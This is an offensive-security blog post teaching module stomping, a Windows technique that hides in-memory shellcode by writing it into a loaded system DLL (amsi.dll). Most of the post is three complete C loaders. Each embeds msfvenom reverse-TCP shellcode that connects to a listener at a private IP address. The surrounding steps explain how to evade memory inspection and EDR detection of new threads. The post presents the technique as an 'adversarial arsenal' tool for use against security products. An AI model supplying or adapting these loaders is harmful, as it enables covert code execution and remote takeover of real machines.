Tradecraft Improvement 2 - Module Stomping
Introduction
In the second installment of the tradecraft improvement series we will be discussing about a very common technique used when running/injecting shellcode in-memory. Most of the time when we directly inject shellcode in-memory of the current process or a remote process, it shows up as an unbacked memory region. That means there is no originating file for that particular memory. This will raise suspicion if the thread memory are being inspected.
There are a lot of techniques available to solve this problem. Most common of them is Module Stomping. In this technique the attacker loads a benign DLL into the current process or a remote process and injects the shellcode into that DLL. As a result when the shellcode is executed the origin will be shown from the loaded benign DLL.
Steps Required to use Module Stomping
- First we load a benign DLL from the disk
- We get the entry point of the DLL
- Using the entry point we choose an arbitrary point inside the DLL where we will be writing our shellcode to
- Make sure that the DLL is large enough to hold our shellcode
- Execute the shellcode inside the DLL by either creating a new thread or directly executing the shellcode from the pointer
Checking a normal in memory shellcode runner
First we will look at what happens when we inject shellcode in memory of the process directly.
For this we will use a normal shellcode injection code this to test.
#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef HANDLE (WINAPI *CreateThread_t)(
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
__drv_aliasesMem LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
//msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.181.143 LPORT=443 -f c EXITFUNC=thread
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
size_t payloadsize = sizeof(shellcode);
int main()
{
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");
LPVOID ptr = VirtualAlloc_p(NULL, payloadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(ptr, shellcode, payloadsize);
//pause to inspect
getchar();
HANDLE hThread = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE)ptr, NULL, 0, 0);
if (hThread == NULL)
{
printf("Error Creating thread\n");
return -1;
}
printf("Thread Created\n");
getchar();
WaitForSingleObject(hThread, INFINITE);
return 0;
}
-
This is a normal shellcode injection which allocates a
RWX
memory region and then copies the shellcode into that memory region -
Then it will start a new thread to execute the shellcode
-
Compile this code and run it
-
This shellcode will spawn a reverse shell on our netcat listener
-
Once the code pauses, inspect it using
Process Hacker
- Once the thread is create inspect the process
- We will see that a strange address is there in the callstack of the thread, which is not backed by any module
-
Furthermore inspecting this strange memory address, we will find our shellcode loaded in a
RWX
memory region -
Now our aim is to make sure that the origin of the shellcode looks as if it is from a legit module
Implementing Module Stomping
The following code implements module stomping.
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef BOOL (WINAPI *VirtualProtect_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
typedef HANDLE (WINAPI *CreateThread_t)(
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
__drv_aliasesMem LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
size_t payloadsize = sizeof(shellcode);
int main()
{
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");
//Load the library to inject code into
HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");
printf("Address of library : %p\n", lib);
SetLastError(0);
if (lib != NULL)
{
//Finding a location inside the DLL to write the shellcode to
PDWORD libPtr = lib + 2*4096;
printf("Address : %p\n", libPtr);
DWORD temp = 0;
//Change memory protection before writing the shellcode
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
memcpy(libPtr, shellcode, payloadsize);
//adjust the protection as before
VirtualProtect_p(libPtr, payloadsize , temp,&temp);
//start a new thread
HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
if(hThread == NULL)
{
printf("Thread not created\n");
}
}
printf("Attach here\n");
getchar();
return 0;
}
-
In order to implement module stomping we first need to find a DLL which will be large enough to hold our shellcode and should look benign at the same time.
-
For this reason I have decided to use the
amsi.dll
(Got the idea from iredteam) -
This is done using
LoadLibraryA
-
Next we select a region inside the module where we can easily write our shellcode
PDWORD libPtr = lib + 2*4096;
- Then adjust the memory permissions to
PAGE_READWRITE
so that we are able to copy our shellcode there
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
- Use
memcpy
to copy the shellcode to the selected memory region inside the module
memcpy(libPtr, shellcode, payloadsize);
-
Once the shellcode is copied re-adjust the permissions of that memory region
-
Now use
CreateThread
API to execute the shellcode in a new thread -
The start location of the new thread should be the selected location inside the module
HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
- This will give us a reverse shell on our listener
Executing the payload
- Compile and the run the code and attach it using
x64Dbg
- Go to the memory region that is displayed by the program
- We will find our shellcode in that memory region
- Now checking
Process Hacker
we will find that there is a new thread originating fromamsi.dll
- This can be confirmed if we follow the memory map in x64Dbg
-
We will see that this memory address is inside the
amsi.dll
-
We will also get our reverse shell on our listener
Few scopes of improvement
Even though this technique works just fine, we can still improve upon this
Executing the shellcode in the main thread
- You must have noticed we use the
CreateThread
API to create a new thread in order to execute the shellcode - Doing so will result in the creation of a new thread which might be under the detection rules of the EDR system that is used
- A subtle change that we can use to solve this is by using a function pointer.
void (*run)() = (void (*)()) libPtr; run();
- Here we create a pointer to a function that takes no arguments. This function points to the start address of the shellcode
- Then we call that function to execute the shellcode
- Doing so will result in executing the shellcode in the main thread instead of a new thread being created
Our final code should look as follows
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef BOOL (WINAPI *VirtualProtect_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
typedef HANDLE (WINAPI *CreateThread_t)(
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
__drv_aliasesMem LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
size_t payloadsize = sizeof(shellcode);
int main()
{
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");
//Load the library to inject code into
HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");
printf("Address of library : %p\n", lib);
SetLastError(0);
if (lib != NULL)
{
//Finding a location inside the DLL to write the shellcode to
PDWORD libPtr = lib + 2*4096;
printf("Address : %p\n", libPtr);
DWORD temp = 0;
//Change memory protection before writing the shellcode
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
memcpy(libPtr, shellcode, payloadsize);
//adjust the protection as before
VirtualProtect_p(libPtr, payloadsize , temp,&temp);
//start a new thread
/*
HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
if(hThread == NULL)
{
printf("Thread not created\n");
}
*/
void (*run)() = (void (*)()) libPtr; run();
}
printf("Attach here\n");
getchar();
return 0;
}
- Compile and run the code
-
Here we will see that no new thread is being created, however the main thread has loaded the
amsi.dll
on the stack -
This is where the shellcode is getting executed from
-
The main drawback of this approach is that, since the shellcode is getting executed on the main thread, if the shellcode exits, our main process will also stop
-
For some reason if the main thread is killed, the payload will become a zombie process
Complete Thread Stack Spoofing
- In case of module stomping we are just loading a new module from the disk and writing our shellcode to its memory
- This might raise some alerts and can be fingerprinted
- To solve this one can re-write the thread stack for the unbacked memory regions in order to make them look legit.
- If implemented properly without any errors this can be difficult to catch.
Hunting for code caves inside DLLs
- If the shellcode is very large, one needs to look for appropriate locations inside the DLL to write the shellcode to
- Also one needs to check that the loaded DLL is large enough to accommodate the shellcode
Conclusions
This was an introduction to basic module stomping. There are a lot of improvements that can be done to this technique. It is a great technique for one to add to their adversarial arsenal to use against security solutions.
Checkout my source code for this part : https://github.com/dosxuz/TradecraftImrprovement/tree/main/Part-2
Refernces
- https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injectionhttps://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection
- https://medium.com/@Breadman602/breadman-module-stomping-api-unhooking-using-native-apis-b10df89cc0a2